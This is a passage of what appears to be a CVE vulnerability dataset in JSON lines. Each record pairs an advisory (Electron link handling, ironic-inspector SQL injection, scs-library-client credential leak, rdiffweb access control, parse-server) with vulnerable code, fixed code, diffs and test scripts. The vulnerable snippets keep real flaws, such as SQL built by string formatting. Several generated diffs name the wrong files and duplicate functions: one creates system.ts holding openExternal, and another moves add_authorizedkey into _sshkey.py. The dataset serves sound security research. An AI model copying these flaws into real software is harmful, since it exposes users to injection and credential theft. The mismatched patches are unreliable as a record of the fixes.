"fix_js_192_4", "commit": "b3705ff", "file_path": "electron/src/menu/system.ts", "start_line": 250, "end_line": 276, "snippet": "const helpTemplate: MenuItemConstructorOptions = {\n label: `&${locale.getText('menuHelp')}`,\n role: 'help',\n submenu: [\n {\n click: () => WindowUtil.openExternal(config.legalUrl, true),\n label: locale.getText('menuLegal'),\n },\n {\n click: () => WindowUtil.openExternal(config.privacyUrl, true),\n label: locale.getText('menuPrivacy'),\n },\n {\n click: () => WindowUtil.openExternal(config.licensesUrl, true),\n label: locale.getText('menuLicense'),\n },\n {\n click: () => WindowUtil.openExternal(config.supportUrl, true),\n label: locale.getText('menuSupport'),\n },\n {\n click: () => WindowUtil.openExternal(EnvironmentUtil.web.getWebsiteUrl(), true),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n ],\n};"}, {"id": "fix_js_192_5", "commit": "b3705ff", "file_path": "electron/src/window/WindowUtil.ts", "start_line": 57, "end_line": 76, "snippet": "export const openExternal = async (url: string, httpsOnly: boolean = false): Promise => {\n try {\n const urlProtocol = URL.parse(url).protocol || '';\n const allowedProtocols = ['https:'];\n\n if (!httpsOnly) {\n allowedProtocols.push('ftp:', 'http:', 'mailto:');\n }\n\n if (!allowedProtocols.includes(urlProtocol)) {\n logger.warn(`Prevented opening external URL \"${url}\".`);\n showWarningDialog(`Prevented opening external URL \"${url}\".`);\n return;\n }\n\n await shell.openExternal(url);\n } catch (error) {\n logger.error(error);\n }\n};"}], "vul_patch": "--- a/electron/src/window/AboutWindow.ts\n+++ b/electron/src/window/AboutWindow.ts\n@@ -3,12 +3,17 @@\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n+ });\n \n- // Open HTTPS links in browser instead\n- if (url.startsWith('https://')) {\n- await shell.openExternal(url);\n- } else {\n- logger.info(`Attempt to open URL \"${url}\" in window prevented.`);\n- callback({redirectURL: ABOUT_HTML});\n+ // Handle the new window event in the About Window\n+ aboutWindow.webContents.on('new-window', (event, url) => {\n+ event.preventDefault();\n+\n+ // Ensure the link does not come from a webview\n+ if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n+ logger.log('New window was created from a webview, aborting.');\n+ return;\n }\n+\n+ return WindowUtil.openExternal(url, true);\n });\n\n--- a/electron/src/main.ts\n+++ b/electron/src/main.ts\n@@ -6,6 +6,3 @@\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n-\n- await shell.openExternal(url);\n- });\n\n--- a/electron/src/main.ts\n+++ b/electron/src/main.ts\n@@ -13,5 +13,5 @@\n }\n \n this.logger.log('Opening an external window from a webview.');\n- return shell.openExternal(url);\n+ return WindowUtil.openExternal(url);\n };\n\n--- a/electron/src/menu/system.ts\n+++ b/electron/src/menu/system.ts\n@@ -3,23 +3,23 @@\n role: 'help',\n submenu: [\n {\n- click: () => shell.openExternal(config.legalUrl),\n+ click: () => WindowUtil.openExternal(config.legalUrl, true),\n label: locale.getText('menuLegal'),\n },\n {\n- click: () => shell.openExternal(config.privacyUrl),\n+ click: () => WindowUtil.openExternal(config.privacyUrl, true),\n label: locale.getText('menuPrivacy'),\n },\n {\n- click: () => shell.openExternal(config.licensesUrl),\n+ click: () => WindowUtil.openExternal(config.licensesUrl, true),\n label: locale.getText('menuLicense'),\n },\n {\n- click: () => shell.openExternal(config.supportUrl),\n+ click: () => WindowUtil.openExternal(config.supportUrl, true),\n label: locale.getText('menuSupport'),\n },\n {\n- click: () => shell.openExternal(EnvironmentUtil.web.getWebsiteUrl()),\n+ click: () => WindowUtil.openExternal(EnvironmentUtil.web.getWebsiteUrl(), true),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n\n--- /dev/null\n+++ b/electron/src/menu/system.ts\n@@ -0,0 +1,20 @@\n+export const openExternal = async (url: string, httpsOnly: boolean = false): Promise => {\n+ try {\n+ const urlProtocol = URL.parse(url).protocol || '';\n+ const allowedProtocols = ['https:'];\n+\n+ if (!httpsOnly) {\n+ allowedProtocols.push('ftp:', 'http:', 'mailto:');\n+ }\n+\n+ if (!allowedProtocols.includes(urlProtocol)) {\n+ logger.warn(`Prevented opening external URL \"${url}\".`);\n+ showWarningDialog(`Prevented opening external URL \"${url}\".`);\n+ return;\n+ }\n+\n+ await shell.openExternal(url);\n+ } catch (error) {\n+ logger.error(error);\n+ }\n+};\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10141", "cve_description": "A vulnerability was found in openstack-ironic-inspector all versions excluding 5.0.2, 6.0.3, 7.2.4, 8.0.3 and 8.2.1. A SQL-injection vulnerability was found in openstack-ironic-inspector's node_cache.find_node(). This function makes a SQL query using unfiltered data from a server reporting inspection results (by a POST to the /v1/continue endpoint). Because the API is unauthenticated, the flaw could be exploited by an attacker with access to the network on which ironic-inspector is listening. Because of how ironic-inspector uses the query results, it is unlikely that data could be obtained. However, the attacker could pass malicious data and create a denial of service.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/openstack/ironic-inspector", "patch_url": ["https://github.com/openstack/ironic-inspector/commit/9d107900b2e0b599397b84409580d46e0ed16291", "https://github.com/openstack/ironic-inspector/commit/97f9d34f8376ac7accd2597b3bdce67a9dac664f", "https://github.com/openstack/ironic-inspector/commit/17c796b49171b6133e988f78c92d7c9b7ed3fcf3", "https://github.com/openstack/ironic-inspector/commit/67ff87ebca1016d44bd9d284ec4c16a88a533cfc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_134_1", "commit": "b8d1bda", "file_path": "ironic_inspector/node_cache.py", "start_line": 819, "end_line": 894, "snippet": "def find_node(**attributes):\n \"\"\"Find node in cache.\n\n Looks up a node based on attributes in a best-match fashion.\n This function acquires a lock on a node.\n\n :param attributes: attributes known about this node (like macs, BMC etc)\n also ironic client instance may be passed under 'ironic'\n :returns: structure NodeInfo with attributes ``uuid`` and ``created_at``\n :raises: Error if node is not found or multiple nodes match the attributes\n \"\"\"\n ironic = attributes.pop('ironic', None)\n # NOTE(dtantsur): sorting is not required, but gives us predictability\n found = collections.Counter()\n\n for (name, value) in sorted(attributes.items()):\n if not value:\n LOG.debug('Empty value for attribute %s', name)\n continue\n if not isinstance(value, list):\n value = [value]\n\n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n value_list = []\n for v in value:\n value_list.append(\"name='%s' AND value='%s'\" % (name, v))\n stmt = ('select distinct node_uuid from attributes where ' +\n ' OR '.join(value_list))\n rows = (db.model_query(db.Attribute.node_uuid).from_statement(\n text(stmt)).all())\n found.update(row.node_uuid for row in rows)\n\n if not found:\n raise utils.NotFoundInCacheError(_(\n 'Could not find a node for attributes %s') % attributes)\n\n most_common = found.most_common()\n LOG.debug('The following nodes match the attributes: %(attributes)s, '\n 'scoring: %(most_common)s',\n {'most_common': ', '.join('%s: %d' % tpl for tpl in most_common),\n 'attributes': ', '.join('%s=%s' % tpl for tpl in\n attributes.items())})\n\n # NOTE(milan) most_common is sorted, higher scores first\n highest_score = most_common[0][1]\n found = [item[0] for item in most_common if highest_score == item[1]]\n if len(found) > 1:\n raise utils.Error(_(\n 'Multiple nodes match the same number of attributes '\n '%(attr)s: %(found)s')\n % {'attr': attributes, 'found': found}, code=404)\n\n uuid = found.pop()\n node_info = NodeInfo(uuid=uuid, ironic=ironic)\n node_info.acquire_lock()\n\n try:\n row = (db.model_query(db.Node.started_at, db.Node.finished_at).\n filter_by(uuid=uuid).first())\n\n if not row:\n raise utils.Error(_(\n 'Could not find node %s in introspection cache, '\n 'probably it\\'s not on introspection now') % uuid, code=404)\n\n if row.finished_at:\n raise utils.Error(_(\n 'Introspection for node %(node)s already finished on '\n '%(finish)s') % {'node': uuid, 'finish': row.finished_at})\n\n node_info.started_at = row.started_at\n return node_info\n except Exception:\n with excutils.save_and_reraise_exception():\n node_info.release_lock()"}], "fix_func": [{"id": "fix_py_134_1", "commit": "9d10790", "file_path": "ironic_inspector/node_cache.py", "start_line": 819, "end_line": 891, "snippet": "def find_node(**attributes):\n \"\"\"Find node in cache.\n\n Looks up a node based on attributes in a best-match fashion.\n This function acquires a lock on a node.\n\n :param attributes: attributes known about this node (like macs, BMC etc)\n also ironic client instance may be passed under 'ironic'\n :returns: structure NodeInfo with attributes ``uuid`` and ``created_at``\n :raises: Error if node is not found or multiple nodes match the attributes\n \"\"\"\n ironic = attributes.pop('ironic', None)\n # NOTE(dtantsur): sorting is not required, but gives us predictability\n found = collections.Counter()\n\n for (name, value) in sorted(attributes.items()):\n if not value:\n LOG.debug('Empty value for attribute %s', name)\n continue\n if not isinstance(value, list):\n value = [value]\n\n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n query = db.model_query(db.Attribute.node_uuid)\n pairs = [(db.Attribute.name == name) &\n (db.Attribute.value == v) for v in value]\n query = query.filter(six.moves.reduce(operator.or_, pairs))\n found.update(row.node_uuid for row in query.distinct().all())\n\n if not found:\n raise utils.NotFoundInCacheError(_(\n 'Could not find a node for attributes %s') % attributes)\n\n most_common = found.most_common()\n LOG.debug('The following nodes match the attributes: %(attributes)s, '\n 'scoring: %(most_common)s',\n {'most_common': ', '.join('%s: %d' % tpl for tpl in most_common),\n 'attributes': ', '.join('%s=%s' % tpl for tpl in\n attributes.items())})\n\n # NOTE(milan) most_common is sorted, higher scores first\n highest_score = most_common[0][1]\n found = [item[0] for item in most_common if highest_score == item[1]]\n if len(found) > 1:\n raise utils.Error(_(\n 'Multiple nodes match the same number of attributes '\n '%(attr)s: %(found)s')\n % {'attr': attributes, 'found': found}, code=404)\n\n uuid = found.pop()\n node_info = NodeInfo(uuid=uuid, ironic=ironic)\n node_info.acquire_lock()\n\n try:\n row = (db.model_query(db.Node.started_at, db.Node.finished_at).\n filter_by(uuid=uuid).first())\n\n if not row:\n raise utils.Error(_(\n 'Could not find node %s in introspection cache, '\n 'probably it\\'s not on introspection now') % uuid, code=404)\n\n if row.finished_at:\n raise utils.Error(_(\n 'Introspection for node %(node)s already finished on '\n '%(finish)s') % {'node': uuid, 'finish': row.finished_at})\n\n node_info.started_at = row.started_at\n return node_info\n except Exception:\n with excutils.save_and_reraise_exception():\n node_info.release_lock()"}], "vul_patch": "--- a/ironic_inspector/node_cache.py\n+++ b/ironic_inspector/node_cache.py\n@@ -22,14 +22,11 @@\n \n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n- value_list = []\n- for v in value:\n- value_list.append(\"name='%s' AND value='%s'\" % (name, v))\n- stmt = ('select distinct node_uuid from attributes where ' +\n- ' OR '.join(value_list))\n- rows = (db.model_query(db.Attribute.node_uuid).from_statement(\n- text(stmt)).all())\n- found.update(row.node_uuid for row in rows)\n+ query = db.model_query(db.Attribute.node_uuid)\n+ pairs = [(db.Attribute.name == name) &\n+ (db.Attribute.value == v) for v in value]\n+ query = query.filter(six.moves.reduce(operator.or_, pairs))\n+ found.update(row.node_uuid for row in query.distinct().all())\n \n if not found:\n raise utils.NotFoundInCacheError(_(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23538", "cve_description": "github.com/sylabs/scs-library-client is the Go client for the Singularity Container Services (SCS) Container Library Service. When the scs-library-client is used to pull a container image, with authentication, the HTTP Authorization header sent by the client to the library service may be incorrectly leaked to an S3 backing storage provider. This occurs in a specific flow, where the library service redirects the client to a backing S3 storage server, to perform a multi-part concurrent download. Depending on site configuration, the S3 service may be provided by a third party. An attacker with access to the S3 service may be able to extract user credentials, allowing them to impersonate the user. The vulnerable multi-part concurrent download flow, with redirect to S3, is only used when communicating with a Singularity Enterprise 1.x installation, or third party server implementing this flow. Interaction with Singularity Enterprise 2.x, and Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. We encourage all users to update. Users who interact with a Singularity Enterprise 1.x installation, using a 3rd party S3 storage service, are advised to revoke and recreate their authentication tokens within Singularity Enterprise. There is no workaround available at this time.", "cwe_info": {"CWE-522": {"name": "Insufficiently Protected Credentials", "description": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval."}}, "repo": "https://github.com/sylabs/scs-library-client", "patch_url": ["https://github.com/sylabs/scs-library-client/commit/68ac4cab5cda0afd8758ff5b5e2e57be6a22fcfa"], "programing_language": "Go", "vul_func": [{"id": "vul_go_71_1", "commit": "54fbe14", "file_path": "client/pull.go", "start_line": 106, "end_line": 115, "snippet": "func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n\treq, err := c.newRequestWithURL(ctx, http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n\treturn c.HTTPClient.Do(req)\n}"}], "fix_func": [{"id": "fix_go_71_1", "commit": "68ac4cab5cda0afd8758ff5b5e2e57be6a22fcfa", "file_path": "client/pull.go", "start_line": 106, "end_line": 119, "snippet": "func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n\treq, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif v := c.UserAgent; v != \"\" {\n\t\treq.Header.Set(\"User-Agent\", v)\n\t}\n\n\treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n\treturn c.HTTPClient.Do(req)\n}"}], "vul_patch": "--- a/client/pull.go\n+++ b/client/pull.go\n@@ -1,7 +1,11 @@\n func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n-\treq, err := c.newRequestWithURL(ctx, http.MethodGet, url, nil)\n+\treq, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)\n \tif err != nil {\n \t\treturn nil, err\n+\t}\n+\n+\tif v := c.UserAgent; v != \"\" {\n+\t\treq.Header.Set(\"User-Agent\", v)\n \t}\n \n \treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23538:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scs-library-client\nrm -rf ./client/pull_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_httpGetRangeRequest_NoAuthHeader$ github.com/sylabs/scs-library-client/client\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23538:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scs-library-client\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd client && go test -timeout 30s -v github.com/sylabs/scs-library-client/client\n"} {"cve_id": "CVE-2022-4724", "cve_description": "Improper Access Control in GitHub repository ikus060/rdiffweb prior to 2.5.5.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/c4a19cf67d575c4886171b8efcbf4675d51f3929"], "programing_language": "Python", "vul_func": [{"id": "vul_py_54_1", "commit": "d1aaa96", "file_path": "rdiffweb/core/model/__init__.py", "start_line": 70, "end_line": 139, "snippet": "@event.listens_for(Base.metadata, 'after_create')\ndef db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n \"\"\"\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Add repo's Encoding\n _column_add(connection, RepoObject.__table__.c.Encoding)\n _column_add(connection, RepoObject.__table__.c.keepdays)\n\n # Create column for roles using \"isadmin\" column. Keep the\n # original column in case we need to revert to previous version.\n if not _column_exists(connection, UserObject.__table__.c.role):\n _column_add(connection, UserObject.__table__.c.role)\n UserObject.query.filter(UserObject._is_admin == 1).update({UserObject.role: UserObject.ADMIN_ROLE})\n\n # Add user's fullname column\n _column_add(connection, UserObject.__table__.c.fullname)\n\n # Add user's mfa column\n _column_add(connection, UserObject.__table__.c.mfa)\n\n # Re-create session table if Number column is missing\n if not _column_exists(connection, SessionObject.__table__.c.Number):\n SessionObject.__table__.drop()\n SessionObject.__table__.create()\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Remove preceding and leading slash (/) generated by previous\n # versions. Also rename '.' to ''\n result = RepoObject.query.all()\n for row in result:\n if row.repopath.startswith('/') or row.repopath.endswith('/'):\n row.repopath = row.repopath.strip('/')\n row.commit()\n if row.repopath == '.':\n row.repopath = ''\n row.commit()\n # Remove duplicates and nested repositories.\n result = RepoObject.query.order_by(RepoObject.userid, RepoObject.repopath).all()\n prev_repo = (None, None)\n for row in result:\n if prev_repo[0] == row.userid and (prev_repo[1] == row.repopath or row.repopath.startswith(prev_repo[1] + '/')):\n row.delete()\n else:\n prev_repo = (row.userid, row.repopath)\n\n # Fix username case insensitive unique\n if not _index_exists(connection, 'user_username_index'):\n duplicate_users = (\n UserObject.query.with_entities(func.lower(UserObject.username))\n .group_by(func.lower(UserObject.username))\n .having(func.count(UserObject.username) > 1)\n ).all()\n try:\n user_username_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make Username case insensitive. '\n 'You must downgrade and deleted duplicate Username. '\n '%s' % '\\n'.join([str(k) for k in duplicate_users]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)"}, {"id": "vul_py_54_2", "commit": "d1aaa96", "file_path": "rdiffweb/core/model/_user.py", "start_line": 153, "end_line": 185, "snippet": " def add_authorizedkey(self, key, comment=None):\n \"\"\"\n Add the given key to the user. Adding the key to his `authorized_keys`\n file if it exists and adding it to database.\n \"\"\"\n # Parse and validate ssh key\n assert key\n key = authorizedkeys.check_publickey(key)\n\n # Remove option, replace comments.\n key = authorizedkeys.AuthorizedKey(\n options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n )\n\n # If a filename exists, use it by default.\n filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n if os.path.isfile(filename):\n with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n if authorizedkeys.exists(fh, key):\n raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n authorizedkeys.add(fh, key)\n else:\n # Also look in database.\n logger.info(\"add key [%s] to [%s] database\", key, self.username)\n try:\n SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue()).add().flush()\n except IntegrityError:\n raise DuplicateSSHKeyError(\n _(\"Duplicate key. This key already exists or is associated to another user.\")\n )\n cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)"}], "fix_func": [{"id": "fix_py_54_1", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/__init__.py", "start_line": 71, "end_line": 158, "snippet": "def db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n \"\"\"\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Add repo's Encoding\n _column_add(connection, RepoObject.__table__.c.Encoding)\n _column_add(connection, RepoObject.__table__.c.keepdays)\n\n # Create column for roles using \"isadmin\" column. Keep the\n # original column in case we need to revert to previous version.\n if not _column_exists(connection, UserObject.__table__.c.role):\n _column_add(connection, UserObject.__table__.c.role)\n UserObject.query.filter(UserObject._is_admin == 1).update({UserObject.role: UserObject.ADMIN_ROLE})\n\n # Add user's fullname column\n _column_add(connection, UserObject.__table__.c.fullname)\n\n # Add user's mfa column\n _column_add(connection, UserObject.__table__.c.mfa)\n\n # Re-create session table if Number column is missing\n if not _column_exists(connection, SessionObject.__table__.c.Number):\n SessionObject.__table__.drop()\n SessionObject.__table__.create()\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Remove preceding and leading slash (/) generated by previous\n # versions. Also rename '.' to ''\n result = RepoObject.query.all()\n for row in result:\n if row.repopath.startswith('/') or row.repopath.endswith('/'):\n row.repopath = row.repopath.strip('/')\n row.commit()\n if row.repopath == '.':\n row.repopath = ''\n row.commit()\n # Remove duplicates and nested repositories.\n result = RepoObject.query.order_by(RepoObject.userid, RepoObject.repopath).all()\n prev_repo = (None, None)\n for row in result:\n if prev_repo[0] == row.userid and (prev_repo[1] == row.repopath or row.repopath.startswith(prev_repo[1] + '/')):\n row.delete()\n else:\n prev_repo = (row.userid, row.repopath)\n\n # Fix username case insensitive unique\n if not _index_exists(connection, 'user_username_index'):\n duplicate_users = (\n UserObject.query.with_entities(func.lower(UserObject.username))\n .group_by(func.lower(UserObject.username))\n .having(func.count(UserObject.username) > 1)\n ).all()\n try:\n user_username_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make Username case insensitive. '\n 'You must downgrade and deleted duplicate Username. '\n '%s' % '\\n'.join([str(k) for k in duplicate_users]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)\n\n # Fix SSH Key uniqueness - since 2.5.4\n if not _index_exists(connection, 'sshkey_fingerprint_index'):\n duplicate_sshkeys = (\n SshKey.query.with_entities(SshKey.fingerprint)\n .group_by(SshKey.fingerprint)\n .having(func.count(SshKey.fingerprint) > 1)\n ).all()\n try:\n sshkey_fingerprint_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make SSH Keys unique. '\n 'You must downgrade and deleted duplicate SSH Keys. '\n '%s' % '\\n'.join([str(k) for k in duplicate_sshkeys]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)"}, {"id": "fix_py_54_2", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/_sshkey.py", "start_line": 24, "end_line": 33, "snippet": "class SshKey(Base):\n __tablename__ = 'sshkeys'\n __table_args__ = {'sqlite_autoincrement': True}\n fingerprint = Column('Fingerprint', Text)\n key = Column('Key', Text, unique=True, primary_key=True)\n userid = Column('UserID', Integer, nullable=False)\n\n\n# Make finger print unique\nsshkey_fingerprint_index = Index('sshkey_fingerprint_index', SshKey.fingerprint, unique=True)"}, {"id": "fix_py_54_3", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/_user.py", "start_line": 153, "end_line": 186, "snippet": " def add_authorizedkey(self, key, comment=None):\n \"\"\"\n Add the given key to the user. Adding the key to his `authorized_keys`\n file if it exists and adding it to database.\n \"\"\"\n # Parse and validate ssh key\n assert key\n key = authorizedkeys.check_publickey(key)\n\n # Remove option & Remove comment for SQL storage\n key = authorizedkeys.AuthorizedKey(\n options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n )\n\n # If a filename exists, use it by default.\n filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n if os.path.isfile(filename):\n with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n if authorizedkeys.exists(fh, key):\n raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n authorizedkeys.add(fh, key)\n else:\n # Also look in database.\n logger.info(\"add key [%s] to [%s] database\", key, self.username)\n try:\n sshkey = SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue())\n sshkey.add().flush()\n except IntegrityError:\n raise DuplicateSSHKeyError(\n _(\"Duplicate key. This key already exists or is associated to another user.\")\n )\n cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)"}], "vul_patch": "--- a/rdiffweb/core/model/__init__.py\n+++ b/rdiffweb/core/model/__init__.py\n@@ -1,4 +1,3 @@\n-@event.listens_for(Base.metadata, 'after_create')\n def db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n@@ -68,3 +67,22 @@\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)\n+\n+ # Fix SSH Key uniqueness - since 2.5.4\n+ if not _index_exists(connection, 'sshkey_fingerprint_index'):\n+ duplicate_sshkeys = (\n+ SshKey.query.with_entities(SshKey.fingerprint)\n+ .group_by(SshKey.fingerprint)\n+ .having(func.count(SshKey.fingerprint) > 1)\n+ ).all()\n+ try:\n+ sshkey_fingerprint_index.create()\n+ except IntegrityError:\n+ msg = (\n+ 'Failure to upgrade your database to make SSH Keys unique. '\n+ 'You must downgrade and deleted duplicate SSH Keys. '\n+ '%s' % '\\n'.join([str(k) for k in duplicate_sshkeys]),\n+ )\n+ logger.error(msg)\n+ print(msg, file=sys.stderr)\n+ raise SystemExit(12)\n\n--- a/rdiffweb/core/model/_user.py\n+++ b/rdiffweb/core/model/_sshkey.py\n@@ -1,33 +1,10 @@\n- def add_authorizedkey(self, key, comment=None):\n- \"\"\"\n- Add the given key to the user. Adding the key to his `authorized_keys`\n- file if it exists and adding it to database.\n- \"\"\"\n- # Parse and validate ssh key\n- assert key\n- key = authorizedkeys.check_publickey(key)\n+class SshKey(Base):\n+ __tablename__ = 'sshkeys'\n+ __table_args__ = {'sqlite_autoincrement': True}\n+ fingerprint = Column('Fingerprint', Text)\n+ key = Column('Key', Text, unique=True, primary_key=True)\n+ userid = Column('UserID', Integer, nullable=False)\n \n- # Remove option, replace comments.\n- key = authorizedkeys.AuthorizedKey(\n- options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n- )\n \n- # If a filename exists, use it by default.\n- filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n- if os.path.isfile(filename):\n- with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n- if authorizedkeys.exists(fh, key):\n- raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n- logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n- authorizedkeys.add(fh, key)\n- else:\n- # Also look in database.\n- logger.info(\"add key [%s] to [%s] database\", key, self.username)\n- try:\n- SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue()).add().flush()\n- except IntegrityError:\n- raise DuplicateSSHKeyError(\n- _(\"Duplicate key. This key already exists or is associated to another user.\")\n- )\n- cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n- cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)\n+# Make finger print unique\n+sshkey_fingerprint_index = Index('sshkey_fingerprint_index', SshKey.fingerprint, unique=True)\n\n--- /dev/null\n+++ b/rdiffweb/core/model/_sshkey.py\n@@ -0,0 +1,34 @@\n+ def add_authorizedkey(self, key, comment=None):\n+ \"\"\"\n+ Add the given key to the user. Adding the key to his `authorized_keys`\n+ file if it exists and adding it to database.\n+ \"\"\"\n+ # Parse and validate ssh key\n+ assert key\n+ key = authorizedkeys.check_publickey(key)\n+\n+ # Remove option & Remove comment for SQL storage\n+ key = authorizedkeys.AuthorizedKey(\n+ options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n+ )\n+\n+ # If a filename exists, use it by default.\n+ filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n+ if os.path.isfile(filename):\n+ with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n+ if authorizedkeys.exists(fh, key):\n+ raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n+ logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n+ authorizedkeys.add(fh, key)\n+ else:\n+ # Also look in database.\n+ logger.info(\"add key [%s] to [%s] database\", key, self.username)\n+ try:\n+ sshkey = SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue())\n+ sshkey.add().flush()\n+ except IntegrityError:\n+ raise DuplicateSSHKeyError(\n+ _(\"Duplicate key. This key already exists or is associated to another user.\")\n+ )\n+ cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n+ cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-4724:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/rdiffweb\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-4724/bin/python -m pytest rdiffweb/core/model/tests/test_user.py -k \"test_add_authorizedkey_duplicate\" -p no:warning --disable-warnings --import-mode=importlib\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-4724:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/rdiffweb\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-4724/bin/python -m pytest rdiffweb/core/model/tests/test_user.py -p no:warning --disable-warnings --import-mode=importlib\n"} {"cve_id": "CVE-2024-27298", "cve_description": "parse-server is a Parse Server for Node.js / Express. This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database. The vulnerability has been fixed in 6.5.0 and 7.0.0-alpha.20.\n", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/parse-community/parse-server", "patch_url": ["https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833", 